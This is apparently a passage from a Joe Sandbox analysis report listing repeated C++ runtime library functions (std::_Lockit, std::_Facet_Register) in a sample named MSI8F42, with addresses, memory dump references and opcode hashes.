                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: 2478367bee76ea70619d581dfd9ba98298fa8894ad2997e652aeb2b4aa3dc0a9
                                                                                                                                            • Instruction ID: 14256a0935a975625645b74e5ed6ca53e0d0b23be3ba73d0056414ed41111c20
                                                                                                                                            • Opcode Fuzzy Hash: 2478367bee76ea70619d581dfd9ba98298fa8894ad2997e652aeb2b4aa3dc0a9
                                                                                                                                            • Instruction Fuzzy Hash: 8A01C435901119DBCB0BEB60C855BBEB774BF44710F25090AE814AF2D2CF709E018B91
                                                                                                                                            Function 002FD752 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 002FD759
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002FD763
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 002FD7B4
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002FD7D4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: 82743eb4580f82140ba180b219dd8db2d11f889f1599618f261f1255647797aa
                                                                                                                                            • Instruction ID: 5dfd41ec60a5f2b97a6369e974764ab2b1219d44be3acb0f25aba08a54e2a90f
                                                                                                                                            • Opcode Fuzzy Hash: 82743eb4580f82140ba180b219dd8db2d11f889f1599618f261f1255647797aa
                                                                                                                                            • Instruction Fuzzy Hash: 7501C03691011E9BCB0AFF60C851ABEFBA6AF84750F240819EA116F2D1CF709E01CB91
                                                                                                                                            Function 003027A2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 003027A9
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 003027B3
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302804
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302824
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: 6d9026ca5f82aba6c50a2db10d714cfed5c5f5a64f0871c3e0f9f440364e9637
                                                                                                                                            • Instruction ID: 6675d57111599bfe36af3d33ec797f4ce4af0b08828251b4a8e198641f5f0b07
                                                                                                                                            • Opcode Fuzzy Hash: 6d9026ca5f82aba6c50a2db10d714cfed5c5f5a64f0871c3e0f9f440364e9637
                                                                                                                                            • Instruction Fuzzy Hash: 8B01C4399012199BCB1BEB64C865ABEB774BF84710F250409E904AF2D2CF309E05CB91
                                                                                                                                            Function 002FD7E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 002FD7EE
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002FD7F8
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 002FD849
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002FD869
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: 241da7bf13a4a3acfd3532387b2fa91dc477b77d7e3d2e038a55e0a9afbbfc55
                                                                                                                                            • Instruction ID: 47c6cc6d5df4d3e421ef15ab20d37f54b015b1ea09d22670f10423bd7e1368c7
                                                                                                                                            • Opcode Fuzzy Hash: 241da7bf13a4a3acfd3532387b2fa91dc477b77d7e3d2e038a55e0a9afbbfc55
                                                                                                                                            • Instruction Fuzzy Hash: 5E01C43591011D9BCB1AFF60D8527BEBBA5AF44790F240419E5016F2D1CF749E428F91
                                                                                                                                            Function 00302837 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030283E
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302848
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302899
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 003028B9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: 6e737379b0e03c02e01f2f3d146d3d8607ee902dd84f1cbc8f839999a1236bd4
                                                                                                                                            • Instruction ID: 4531b24e287c44478619e57ac6307738fbddd793a716388e00aa202c4c299eea
                                                                                                                                            • Opcode Fuzzy Hash: 6e737379b0e03c02e01f2f3d146d3d8607ee902dd84f1cbc8f839999a1236bd4
                                                                                                                                            • Instruction Fuzzy Hash: 3101D639901129DBCB1BEB64C855BBEB7B5BF84710F254919F410AF2D2DF309E018B91
                                                                                                                                            Function 003028CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 003028D3
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 003028DD
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030292E
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030294E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: 2ae9df42ba0b348525f055ddc0dd79c732c6eccce2b2447c8ac1e009e22dd5b1
                                                                                                                                            • Instruction ID: 8251bbf8f281e121ed36bcc5710a058a330c44ece8e536669d29f8b76e195096
                                                                                                                                            • Opcode Fuzzy Hash: 2ae9df42ba0b348525f055ddc0dd79c732c6eccce2b2447c8ac1e009e22dd5b1
                                                                                                                                            • Instruction Fuzzy Hash: A0019235902219DBCB1BEB64D865ABEB7B5AF84720F250909F510AF2D1CF709E418B91
                                                                                                                                            Function 0030E96D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030E974
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030E97E
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030E9CF
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030E9EF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: e4499255ad7555688781400432d8f98d2018425665a9ad3b269aa892baf86aa6
                                                                                                                                            • Instruction ID: 7869fe7c456c77d07744e8aed4f460e17d535030d92cffe792c71851cc55071c
                                                                                                                                            • Opcode Fuzzy Hash: e4499255ad7555688781400432d8f98d2018425665a9ad3b269aa892baf86aa6
                                                                                                                                            • Instruction Fuzzy Hash: C2018035A021199BCB1BEB64D862BBEB7A5BF84710F250909F510AF3D2CF749E41CB91
                                                                                                                                            Function 0030EA02 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030EA09
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030EA13
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030EA64
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030EA84
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: b85cd8ffb23759f8fbabe735124ef8cd036ccc51bffcbee1339a844fedf5cc25
                                                                                                                                            • Instruction ID: a7b4da995fc7a40abc335af6e4b4038ce744be8f2f4df61cd49113a451d8bc59
                                                                                                                                            • Opcode Fuzzy Hash: b85cd8ffb23759f8fbabe735124ef8cd036ccc51bffcbee1339a844fedf5cc25
                                                                                                                                            • Instruction Fuzzy Hash: CF01C035A021199BCB1BEB60C861ABEB7A4BF88710F260809E410AF2D1CF309E418B91
                                                                                                                                            Function 00302BB5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302BBC
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302BC6
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302C17
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302C37
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: 7af1a91ed2a5ab38e52343108aa40b92b83b14c74bc4fcd5772413220c990a77
                                                                                                                                            • Instruction ID: 77749066345e062539c3ca2a71b10c648d2f641ac21e1b4c8ae53af9f4d8a99a
                                                                                                                                            • Opcode Fuzzy Hash: 7af1a91ed2a5ab38e52343108aa40b92b83b14c74bc4fcd5772413220c990a77
                                                                                                                                            • Instruction Fuzzy Hash: 9301C0359021199BCB1BEBA4D865BBEB7B4AF84710F25081AE500AF2D1CF309E01CB91
                                                                                                                                            Function 0030EBC1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030EBC8
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030EBD2
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030EC23
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030EC43
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: 1eb4aba16316eaa6e771dff943af5e075203e176a1bc7879856666ee2afde56f
                                                                                                                                            • Instruction ID: bcc20985c8c6b10e083f63caa982b6a68e85e2a03ca9a03a4def2dcf4c690660
                                                                                                                                            • Opcode Fuzzy Hash: 1eb4aba16316eaa6e771dff943af5e075203e176a1bc7879856666ee2afde56f
                                                                                                                                            • Instruction Fuzzy Hash: 0501D636A011199BCB1BEB60C8567BEB7B4BF84710F150809F511AF2D1CF30AE018B91
                                                                                                                                            Function 0030EC56 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030EC5D
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030EC67
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030ECB8
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030ECD8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: 6f313fc06480da15847e37d72c3e2cd85b3cb8c4d7171887722cf78f037891dd
                                                                                                                                            • Instruction ID: 4b59cc80a88190b9bc9c5a6cf69c26273dc117d9c36ff234620f7203ce779303
                                                                                                                                            • Opcode Fuzzy Hash: 6f313fc06480da15847e37d72c3e2cd85b3cb8c4d7171887722cf78f037891dd
                                                                                                                                            • Instruction Fuzzy Hash: DD01AD35A01119DBDB1BEBA4C865ABEB7A5AF84720F250819E401AB2D1CF309A418B91
                                                                                                                                            Function 00302C4A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302C51
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302C5B
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302CAC
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302CCC
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: 98b4d3f57ca3dcf2bc45d0775c941f7ca7cd3c649df9369ab16ce6062a0862c0
                                                                                                                                            • Instruction ID: db09dbf1119a58dfa510bf88ebced6fc910e904428f79435b857c491593d3eea
                                                                                                                                            • Opcode Fuzzy Hash: 98b4d3f57ca3dcf2bc45d0775c941f7ca7cd3c649df9369ab16ce6062a0862c0
                                                                                                                                            • Instruction Fuzzy Hash: 2801D235902119DBCB1BEBA4D865ABEB7B4AF84710F250409F510AF2D1CF709E01CB91
                                                                                                                                            Function 00302CDF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302CE6
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302CF0
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302D41
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302D61
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: eabe140bdd8ace028b77dbf9b312b07f90225a716ca30e6dc4ac4f27452a6ad0
                                                                                                                                            • Instruction ID: 1cbbef6583cb7b3ba05e5c5d08ed62ca77ae38225bdc49295cc9f5da43d2fa65
                                                                                                                                            • Opcode Fuzzy Hash: eabe140bdd8ace028b77dbf9b312b07f90225a716ca30e6dc4ac4f27452a6ad0
                                                                                                                                            • Instruction Fuzzy Hash: 1201AD359021199BCB1BEB60D865ABEB7A5AF84710F250509E510BB2D2CF709E018B91
                                                                                                                                            Function 00302E09 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302E10
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302E1A
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302E6B
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302E8B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
